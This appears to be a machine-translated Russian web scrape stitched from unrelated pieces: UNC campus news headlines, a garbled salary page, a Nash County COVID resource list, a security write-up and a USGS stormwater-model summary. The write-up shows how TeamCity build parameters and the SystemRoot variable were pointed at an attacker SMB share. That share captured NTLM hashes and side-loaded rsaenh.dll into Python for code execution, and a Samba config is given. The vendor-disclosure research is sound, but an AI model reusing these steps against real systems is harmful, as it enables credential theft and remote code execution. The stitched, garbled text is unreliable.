На одном из первых занятий Рут Муз преподавала в университете в 1998 году Дженни Хан, автор книги Все мальчики, которых я любила раньше» и шоураннер «Летом, которое я стала красивой», ответили на подсказку литературным образом: персонажи сидят на ступеньках. Дырка в красном купальнике.
Сюжет Дженнифер Трэн / Фото Дастина Дуонга, UNC Media Hub о готовности к чрезвычайным ситуациям от зомби 22 сентября 2022 года. Мероприятие также включало огневые демонстрации.
Зомби вторгаются в UNC для мероприятия по обеспечению готовности к чрезвычайным ситуациям
Персонал был в масках и с зомби-гримом, предоставленным местными визажистами и владельцами домов с привидениями из «Голливудского шоу ужасов» Дином и Старр Джонс.
Кэти Ханрахан, редактор образа жизни WRAL
Бывшая аспирантка Университета Северной Каролины говорит, что ее профессора выгнали ее из программы докторантуры. Теперь она подает иск о дискриминации
Когда Анжелика Роуз Браун была принята в бизнес-школу Кенана Флаглера при Университете Северной Каролины. Программа в 2020 году, по ее словам, приблизила ее на один шаг к ее карьерным устремлениям.
Университеты Северной Каролины используют социальные сети для отслеживания деятельности студентов Университет Восточной Каролины, Университет Северной Каролины A&T, Университет Северной Каролины в Эшвилле, Университет Дьюка и Университет Уэйк Форест — для выявления студентов, участвующих в политических протестах.
Семь кампусов колледжей Северной Каролины тайно отслеживали сообщения студентов и протестующих в социальных сетях
Вторжение старшего брата в частную жизнь или активная полиция? Это вопрос после того, как новый отчет показал, что семь университетов Северной Каролины используют или использовали мощные программы мониторинга социальных сетей, чтобы следить за всем, от протестов в кампусе до благополучия студентов и наркотиков.
Каллен Браудер, ведущий/корреспондент WRAL
Фальсификация напитков, отчеты о нападениях на общежитие UNC расследуются
Полиция UNC расследует сообщение о фальсификации напитков. Предупреждение о преступлении, направленное сообществу кампуса, сообщило студентам, что 26 августа в 200-м квартале Ист-Розмари-стрит погибли две жертвы. Полиция UNC расследует фальсификацию напитков, сообщает о нападении
Полиция UNC расследует предполагаемый случай фальсификации напитков в общежитии в августе.
US News and World Report называет университет штата Северная Каролина, штат Северная Каролина, университетом с самым высоким рейтингом
Первым названным университетом Северной Каролины был Университет Дьюка, занявший 10-е место в рейтинге список.
Студент UNC, обучающийся за границей в Лондоне, рассказывает о «мрачном» настроении в городе
Студент Университета Северной Каролины в Чапел-Хилл и обучающийся за границей в Лондоне описывает глубокое влияние смерти королевы на город и то, каково было посетить Букингемский дворец после ее смерти.
Студенты UNC, обучающиеся в Лондоне, часть дня творения истории изготовление.
«Мне угрожали убить меня:» Франклин-стрит становится страшным местом для студентов, сотрудников
Устные угрозы. Агрессивное попрошайничество. Сексуальное домогательство. Все на Франклин-стрит в Чапел-Хилл.
Сара Крюгер, репортер WRAL Durham
Общежитие UNC стало объектом многочисленных взломов, отчеты о воровстве оповещение сообщества кампуса.
Бывший аспирант UNC подает в суд на университет за дискриминацию
Иск, поданный в федеральный суд, последовал за шквалом других исков о расовой дискриминации в UNC в последние годы.
Бывший аспирант подает в суд на UNC из-за расовой дискриминации
Бывший аспирант Университета Северной Каролины в Чапел-Хилл подал федеральный иск против школы за расовую дискриминацию и месть .
Студенты UNC обеспокоены арестом ALE на Франклин-стрит
Правоохранительные органы Северной Каролины 25 августа провели операцию по всему штату, в ходе которой они арестовали и предъявили обвинение Александру Самнеру.
«Это наши сокурсники»: высказаны опасения по поводу применения силы ALE при аресте студента UNC
Правоохранительные органы Северной Каролины проводили операцию по всему штату 25 августа. когда они арестовали и предъявили обвинение Александру Самнеру.
Моника Кейси, репортер WRAL Durham
Десятки тысяч студентов, очень мало доз вакцины против оспы обезьян в начале учебного года
В начале осеннего семестра, Дьюк, Университет Университет Северной Каролины в Чапел-Хилл и Университете штата Северная Каролина предлагают студентам вакцины против обезьяньей оспы, но их очень не хватает.
Джо Фишер, корреспондент WRAL
UNC принимает меры предосторожности против COVID и обезьяньей оспы, поскольку студенты возвращаются в кампус
День заселения начинается в среду в Университете Северной Каролины в Чапел-Хилл, когда некоторые из первых студентов колледжей в Треугольнике возвращаются в кампус на осенний семестр.
Кинан Уиллард, репортер WRAL Восточная Северная Каролина
Въезд в Университет Северной Каролины начинается во время вспышки обезьяньей оспы
Как и другие университеты и учреждения, Университет Северной Каролины занимается двумя проблемами общественного здравоохранения — коронавирус и оспа обезьян.
Медицинские ординаторы UNC активизировались, чтобы помочь пострадавшим от наводнения в Кентукки
Во вторник два ординатора нейрохирургии Университета Северной Каролины в Чапел-Хилл вмешались с некоторой помощью сверху.
Cooper, правозащитная группа, корпорации подают сводки в поддержку политики допуска UNC в дело
Верховного суда США. Ожидается, что в этом году Верховный суд США заслушает аргументы по делу, которое оспаривает политику UNC-Chapel Hill по учету расы при приеме.
Марк Бергин, старший мультиплатформенный продюсер WRAL
Университет Северной Каролины выпускает протоколы COVID 2022 осенью 2022 года , 2 августа
Университет Северной Каролины в списке лучших больниц Северной Каролины
Университетская больница Дьюка возглавляет ежегодный список лучших больниц Северной Каролины, составленный US News and World Report.
Журналистка Николь Ханна-Джонс не может подать заявку на работу в UNC-Chapel до 2028 года, согласно соглашению
год. Ханна-Джонс отказалась от пятилетнего контракта и вместо этого поступила в Университет Говарда.
Брайан Андерсон, репортер правительства штата WRAL
Обратная связь
Заработная плата фронтального погрузчика в Северной Каролине
Штаты с более высокими окладами для фронтальных погрузчиков
Фронтальные погрузчики, работающие в Северной Каролине, будут получать самую высокую зарплату в США, за ней следуют Калифорния и округ Колумбия. В этих штатах больше возможностей для трудоустройства, чем в других местах. В то же время конкуренция будет более жесткой. Людям необходимо повысить свою конкурентоспособность, чтобы получить работу в этих городах.
Топ-5 штатов с более высокими зарплатами для
Фронтальный погрузчик в США:
Фронтальный погрузчик на Аляске: 38 303 долл. США
Фронтальный погрузчик в Калифорнии: 38 166 долл. США
Фронтальный погрузчик в округе Колумбия: 38 006 долл. США
Фронтальный погрузчик в Нью-Джерси: 37 7175 долл. США
Фронтальный погрузчик в Массачусетсе: $37 175
Вакансии Front End Loader имеют много разных направлений. И название должности также может сильно отличаться от в разных компаниях. В некоторые должности может не входить загрузчик переднего плана, хотя у них есть обязанности загрузчика переднего плана. Итак, вот несколько похожих вакансий и их зарплаты. Щелкните ссылку, которая вас интересует, чтобы изучить дополнительные данные.
Front End Loader Operator
Average salary
United States
$33,408
per Year
View salaries
Job openings
Front Loader Operator
Average salary
United States
$34,861
per Year
Посмотреть зарплаты
Вакансии
Front End Manager
Средняя зарплата
США
$48,864
в год
View salaries
Job openings
Front End Programmer
Average salary
United States
$67,802
per Year
View salaries
Job openings
Front End Supervisor
Average salary
United States
$34 220
в год
Посмотреть зарплаты
Вакансии
Front End Designer
Средняя зарплата
США
$69 823
в год
Посмотреть зарплаты
Вакансии
Получите примерный расчет того, сколько вы должны зарабатывать, и представление о возможностях вашей карьеры.
Часто задаваемые вопросы
Общие вопросы о заработной плате фронтального погрузчика
Получите личный отчет о зарплате, чтобы узнать, какие факторы могут повлиять на зарплату фронтального погрузчика.
Эта информация полезна?
Спасибо!
Эта модель также получила множество положительных отзывов от клиентов, о чем свидетельствует ее средний рейтинг 4,7/5 из более чем 150 обзоров Google, поэтому мы выбрали ее как лучшую стиральную машину среднего класса с фронтальной загрузкой.
Полезна ли эта информация?
Спасибо!
Подробные диапазоны заработной платы для профессий, аналогичных фронтальному погрузчику, см. на следующих страницах вакансий:
Оператор фронтального погрузчика
Оператор фронтального погрузчика
Интерфейсный менеджер
Интерфейсный программист
Внешний супервайзер
Интерфейсный дизайнер
Архитектор интерфейса
Ведущий интерфейс
Front-End специалист
Ведущий разработчик интерфейса
Полезна ли эта информация?
Спасибо!
В Гарисбурге самая высокая заработная плата фронтального погрузчика. Получите личный отчет о зарплате, чтобы узнать больше информации о зарплате в разных городах.
Полезна ли эта информация?
Спасибо!
Career Insights
Информация о COVID-19 | Округ Нэш, Северная Каролина,
Перейти к основному содержанию
Загрузка
Создайте учетную запись — повысьте свою производительность, настройте свой опыт и получайте информацию, которая вам важна.
- Войти
Поиск
Провайдер | ||
---|---|---|
Nash UNC Health Care | www.nashunchealthcare.org | |
Аптека Бейли | 252-235-3562 | |
Аптека CVS | www.![]() | |
Медицинская группа Восточной Северной Каролины | Скалистая гора | 984-215-5485 |
New Beginning Family Services of NC | Скалистая гора | 252-266-3164 |
ОИК | Скалистая гора | 252-210-9019 |
Аптека Саутсайд | Весенняя надежда | 252-478-5969 |
Аптека Walgreens | www.![]() | |
Аптека Walmart | www.walmart.com | |
Клиники через Северную Каролину | www.myspot.nc.gov |
Для получения данных посетите панель мониторинга COVID-19 Министерства здравоохранения и социальных служб Северной Каролины по адресу https://covid19.ncdhhs.gov/dashboard
Информация о V-Safe (на английском языке)
Информация о V-Safe (на испанском языке)
Вы можете записаться на тест в Департаменте здравоохранения округа Нэш или в любом из других агентств по тестированию, перечисленных здесь. Выполните поиск по почтовому индексу, чтобы найти ближайшее к вам место.
Нажмите здесь, чтобы найти места тестирования
Это учреждение предоставляет равные возможности.
- Округ Нэш
- Вашингтон-стрит, 120 Вт,
- Люкс 3072
- Нэшвилл, Северная Каролина 27856
- Телефон: 252-459-9800
- Должен ли я быть резидентом округа Нэш или гражданином США, чтобы работать в округе Нэш?
- Как долго мое приложение будет оставаться активным?
- Могу ли я отправить только резюме?
/FAQ.aspx
- Доступ сотрудников
- Дом
- Карта сайта
- Свяжитесь с нами
- Доступность
- Уведомления об авторских правах
/QuickLinks. aspx
[]
Случай боковой загрузки DLL из UNC через переменную среды Windows
Около месяца назад я решил взглянуть на JetBrains TeamCity, так как хотел узнать больше о CVE-2022-25263 (аутентифицированное внедрение команд ОС в агенте). Push-функция).
Первоначально я просто хотел найти затронутую функцию и протестировать меры по смягчению последствий, в конце концов я стал искать другие интересные варианты поведения, которые можно было бы считать проблемами безопасности, и наткнулся на то, что я считал уязвимостью, однако после раскрытия информации поставщик убедил меня, что ситуация считается нормальной в контексте TeamCity и его модели потоков. Поскольку функция, которую я тестировал, позволила мне установить некоторые переменные среды, которые позже были переданы в данный процесс шага сборки (в моем случае это был python.exe).
Во время этого процесса я случайно обнаружил, что Python в Windows можно использовать для боковой загрузки произвольной библиотеки DLL с именем rsaenh. dll, помещенной в каталог с именем system32, расположенный в каталоге, указанном переменной среды SystemRoot, переданной процессу (это загружает %SystemRoot%/system32/rsaenh.dll).
В целях тестирования я установил TeamCity в 64-разрядной версии Windows 10 с настройками по умолчанию, настроив сервер TeamCity и агент TeamCity Build для работы от имени обычного пользователя (это настройка по умолчанию).
Я использовал одну и ту же систему как для TeamCity Server, так и для агента сборки.
Сначала я как администратор создал пример проекта с одним этапом сборки типа Python.
Я установил Python3 (python3.10 из Microsoft App Store, установил флажок, чтобы добавить его в PATH), поэтому агент будет совместим для запуска сборки. Я также создал сценарий сборки hello world python:
С этого момента я переключился на обычную учетную запись пользователя, которой не разрешалось определять или редактировать шаги сборки, а только запускать их, с возможностью управления пользовательскими параметрами сборки (включая некоторые переменные среды).
Я столкнулся с двумя отдельными экземплярами внедрения пути UNC, что позволило мне атаковать агент сборки. В обоих случаях я мог заставить систему подключаться через SMB к выбранному мной ресурсу (что позволило мне захватить хэш NTLM, чтобы я мог попытаться взломать его в автономном режиме или передать его по SMB).
В случае шагов сборки с использованием python также оказалось возможным загрузить произвольный файл DLL из общего ресурса, который я настроил с помощью smbd, размещенного из коробки KALI.
Локальный IP-адрес системы Windows был 192.168.99.4. Я запустил KALI Linux в той же сети под 192.168.99.5.
Внедрение UNC для захвата хэша/NTLM-relay
В окне KALI я запустил ответчик с настройками по умолчанию, например:
Затем, перед запуском сборки, я установил для параметра teamcity.build.checkoutDir значение \\192.168.99.5\pub:
Я также запустил Procmon и настроил фильтр для перехвата любых событий с атрибутом «Путь», содержащим «192. 168.99.5».
Я нажал «Выполнить сборку», в результате чего путь UNC был прочитан службой, как показано на снимке экрана ниже:
Ответчик успешно перехватил хеш (несколько раз):
Я заметил, что teamcity.build.checkoutDir был проверен и в конечном итоге он не будет использоваться для попытки загрузить скрипт сборки (чего я и пытался добиться в первое место, подделав его), и при запуске сборки приложение откатилось к значению по умолчанию C:\TeamCity\buildAgent\work\2b35ac7e0452d98f. Тем не менее, до проверки сервис взаимодействовал с общим ресурсом, чего, я считаю, быть не должно.
Внедрение UNC для загрузки произвольной DLL
Я обнаружил, что могу атаковать агент сборки, отравляя переменные среды так же, как я атаковал сервер, через настройку параметров сборки.
Поскольку на моем этапе сборки использовался Python, я немного поиграл с ним, чтобы посмотреть, могу ли я повлиять на то, как он загружает библиотеки DLL, изменив переменные среды. Оказалось, что могу.
Python в Windows можно использовать для боковой загрузки произвольной библиотеки DLL с именем rsaenh.dll, помещенной в каталог с именем system32, расположенный в каталоге, указанном переменной среды SystemRoot, переданной процессу.
Например, установив для переменной среды SystemRoot значение «\\192.168.99.5\pub» (из значения по умолчанию «C:\WINDOWS»):
В случае python3.10.exe это привело к исполняемый файл пытается загрузить \\192.168.99.5\pub\system32\rsaenh.dll:
При работающем Responder, как и в случае атаки на сервер TeamCity, были захвачены хэши:
Однако, поскольку python3.10 явно стремился загрузиться DLL из пути, которым можно управлять с помощью переменной SystemRoot, я решил развернуть общий ресурс SMB с публичным анонимным доступом и предоставить копию исходного файла rsaenh.dll в каталог pub\system32\, общий для SMB.
Я использовал следующий /etc/samba/smb.config:
[глобальный]
рабочая группа = WORKGROUP
файл журнала = /var/log/samba/log. %m
максимальный размер журнала = 1000
ведение журнала = файл
действие паники = /usr/share/samba/panic-action %d
роль сервера = автономный сервер
сопоставление с гостем = плохой пользователь
[pub]
комментарий = некоторые полезные файлы
только чтение = нет
путь = / home/pub
гость ок = да
создать маску = 0777
маска каталога = 0777
Я остановил Responder, чтобы освободить порт 445, я запустил smbd:
service smbd start
Затем я снова запустил сборку, и исполняемый файл python3.10 успешно загрузил и выполнил DLL из моего общего ресурса, демонстрация вектора RCE в Build Agent:
Не проблема с точки зрения TeamCity
Примерно через неделю после сообщения о проблеме поставщику я получил ответ, уточняющий, что любой пользователь, имеющий доступ к TeamCity, считается доступ ко всем системам агента сборки, поэтому выполнение кода в любой системе агента сборки, запускаемое пользователем с низким уровнем привилегий в TeamCity, не нарушает никаких границ безопасности. Они также предоставили пример более ранней, очень похожей заявки, и пояснение, которое было дано после ее закрытия https://youtrack.jetbrains.com/issue/TW-74408 (с хорошим вектором внедрения кода через переменную окружения perl).
python загружает rsaenh.dll после переменной env SystemRoot
Тот факт, что python использовал переменную окружения для загрузки DLL, сам по себе является интересным явлением, поскольку его можно использовать локально в качестве обходной техники, альтернативной rundll32. exe (https://attack.mitre.org/techniques/T1574/002/, https://attack.mitre.org/techniques/T1129/) — для внедрения вредоносного кода в процесс, созданный из оригинального подписанного python3. 10.exe исполняемый файл.
POC
Для сборки DLL использовался следующий код. Он просто берет текущее имя пользователя и текущую командную строку процесса и добавляет их в текстовый файл с именем poc.txt. Всякий раз, когда DllMain запускается, по какой-либо причине, к файлу poc. txt добавляется строка, содержащая эти данные:
Во-первых, давайте попробуем загрузить его без каких-либо подписей, локально:
Вывод Procmon, отслеживающий любые события с помощью Path заканчивающийся на «rsaenh.dll»:
Файл poc.txt был создан в текущем каталоге C:\Users\evilded\HACKING\SHELLING\research\cmd.exe\python3_side_loading_via_SystemRoot во время работы python:
Подобные случаи
Должно быть больше случаев, когда популярное программное обеспечение использует переменные окружения для поиска некоторых загружаемых общих библиотек.
Для динамического выполнения такого поиска все исполняемые файлы в каталоге области действия можно перебирать и запускать несколько раз, каждый раз проверяя произвольные значения, заданные для отдельных общих переменных среды, таких как %SystemRoot% или %WINDIR%. Это само по себе было бы хорошим подходом для начинающих, но оно определенно не обеспечило бы исчерпывающего охвата — большинство мест в коде, в которых происходят попытки загрузки, недоступны без использования соответствующих командных строк, специфичных для каждого исполняемого файла.
Более исчерпывающим, но также требовательным подходом был бы статический анализ всех PE-файлов в области, которая просто указывает на использование функций LoadLibrary и GetEnv (например, LoadLibraryExW() и _wgetenv(), как python3. 10.exe) в своих таблицах импорта.
Применение стохастической эмпирической модели нагрузки и разбавления Северной Каролины (SELDM) для оценки потенциального воздействия дорожного стока
В 2013 г. Геологическая служба США (USGS) в партнерстве с Федеральным управлением автомобильных дорог США (FHWA) модель качества ливневых вод, называемая стохастической эмпирической моделью разбавления нагрузки (SELDM; Granato, 2013). Модель оптимизирована для дорожных проектов, но теоретически может быть применена к широкому спектру типов разработки. SELDM — это эмпирическая модель, основанная на статистических данных, предварительно заполненная большим количеством данных, необходимых для успешного запуска приложения (Granato, 2013). В модели используются методы Монте-Карло (в отличие от детерминистических методов) для расчета широкого спектра случаев осадков и ливневых стоков в сочетании с концентрациями компонентов качества воды и нагрузками от бассейна вверх по течению и участка шоссе. SELDM особенно полезен для менеджеров по управлению ливневыми стоками, поскольку он позволяет определить статистическую вероятность превышения стандарта качества воды, которое может произойти ниже по течению от места сброса ливневых стоков в течение периода записи, смоделированного в рамках анализа SELDM. SELDM можно использовать для моделирования различных передовых методов управления (BMP), что позволяет пользователю оценить последующее улучшение качества воды в русле от различных устройств для очистки ливневых вод. Эта функциональность делает модель хорошо подходящей для поддержки анализа затрат/выгод, специфичных для BMP. В 2015 году Министерство транспорта Северной Каролины (NCDOT) инициировало партнерство с Южноатлантическим центром водных исследований Геологической службы США (офис в Роли, Северная Каролина) для улучшения национальной модели SELDM с помощью дополнительных данных, характерных для Северной Каролины (Северная Каролина), чтобы улучшить модель. предсказуемость по всему штату.
Конкретные данные Геологической службы США, включенные для улучшения модели NC SELDM, включали отдельные данные о речных потоках Северной Каролины, а также кривые переноса качества воды для выбранных компонентов. Статистика речного стока SELDM (на основе данных за 2015 водный год) была рассчитана для 266 постоянно регистрируемых водомеров и обновлена в базе данных StreamStats, которая доступна в приложении USGS StreamStats для Северной Каролины (доступно онлайн через https://streamstats.usgs). .gov/сс/). Мгновенные данные о реке, доступные в 30 выбранных водосборах с непрерывной записью по всей Северной Каролине с площадью водосбора от 4,12 до 63,3 квадратных миль, были использованы для разработки статистики коэффициента спада для конкретных участков. Данные о качестве воды за 2016 водный год были использованы для построения кривых переноса качества воды для 27 водосборов для следующих компонентов: концентрация взвешенных наносов, общий азот, общий фосфор, мутность, медь, свинец и цинк.
NCDOT выявил отчеты об исследованиях стока с автомагистралей Северной Каролины, содержащие данные о качестве и количестве воды, полученные из источников, не входящих в Геологическую службу США. Эти данные были проверены Геологической службой США и, где это было сочтено приемлемым, были загружены в базу данных FHWA Highway-Runoff, хранилище данных и препроцессор для SELDM (Granato and others, 2018; Granato and Cazenas, 2009).; Смит и Гранато, 2010 г.). На основе методов анализа, задокументированных Гранато (2014 г.) в национальном исследовании BMP, и с использованием доступных данных о качестве воды из выбранных пар участков автомагистралей и стоков BMP, данные о производительности из отчетов об исследованиях стоков автомагистралей Северной Каролины также были проанализированы и включены в модель NC SELDM для трех типов БМП. Результаты анализа, выполненного во время разработки модели NC SELDM, задокументированы в Weaver and others (2019). В 2018 году Геологическая служба США и NCDOT инициировали дополнительное исследование «этапа 2» для модели NC SELDM, чтобы завершить многочисленные модельные симуляции для разработки NC_SELDM_Catalog (электронная таблица Microsoft Excel) выходных данных для широкого диапазона переменных водосбора шоссе и бассейна вверх по течению.
Всего было выполнено 74 880 симуляций SELDM в регионах Пьемонт, Голубой хребет и Прибрежная равнина (24,960 на регион) в Северной Каролине. В каждом регионе завершенное моделирование представляло 12 480 сценариев проектирования (по одному с использованием устройства для очистки стоков от травяных болот и биоудержания BMP). Общая цель каталога состоит в том, чтобы предоставить NCDOT и другим организациям инструмент для использования в процессе проектирования транспорта для быстрой оценки потенциального уровня BMP, который может потребоваться для обработки стока с автомагистралей.